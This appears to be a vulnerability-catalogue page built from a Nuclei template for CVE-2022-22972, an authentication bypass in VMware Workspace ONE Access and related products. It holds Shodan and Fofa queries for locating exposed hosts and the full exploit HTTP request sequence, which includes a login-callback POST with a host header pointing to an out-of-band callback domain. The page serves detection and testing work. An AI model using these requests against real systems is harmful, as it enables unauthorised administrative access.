🔙 목록으로 돌아가기

CVE-2022-22972: VMware Workspace ONE Access/Identity Manager/vRealize Automation - Authentication Bypass

TitleVMware Workspace ONE Access/Identity Manager/vRealize Automation - Authentication Bypass
AuthorFor3stCo1d,princechaddha
SeverityCritical
ImpactSuccessful exploitation of this vulnerability could allow an attacker to bypass authentication and gain unauthorized access to the affected system.
RemediationApply the latest security patches or updates provided by VMware to fix the authentication bypass vulnerability (CVE-2022-22972).
CVSS Score9.8
EPSS Score0.93647
CVE IDCVE-2022-22972
CWE IDCWE-287
Shodan Queryhttp.favicon.hash:-1250474341
Fofa Queryapp="vmware-Workspace-ONE-Access" || app="vmware-Identity-Manager" || app="vmware-vRealize"icon_hash=-1250474341app="vmware-workspace-one-access" || app="vmware-identity-manager" || app="vmware-vrealize"
Tags cve2022 cve vmware auth-bypass oast vuln vkev

🔍 Vulnerability Description

VMware Workspace ONE Access, Identity Manager and vRealize Automation contain an authentication bypass vulnerability affecting local domain users. A malicious actor with network access to the UI may be able to obtain administrative access without the need to authenticate.

🌐 HTTP Request

GET /vcac/ HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36
Connection: close
Accept-Encoding: gzip
GET /vcac/?original_uri=/%2Fvcac HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Safari/605.1.15
Connection: close
Accept-Encoding: gzip
POST /SAAS/auth/login/embeddedauthbroker/callback HTTP/1.1
Host: d5jm461le0o4er4dqs2gxnxcuaoudfkss.oast.live
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.4 Mobile/15E148 Safari/604.1
Connection: close
Content-Length: 168
Content-type: application/x-www-form-urlencoded
Accept-Encoding: gzip

protected_state=3bD9Qr&userstore=pNTKM9&username=administrator&password=horizon&userstoreDisplay=Cyf0bu&horizonRelayState=4YsCKC&stickyConnectorId=g3xcia&action=Sign+in

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-22972.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-22972.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A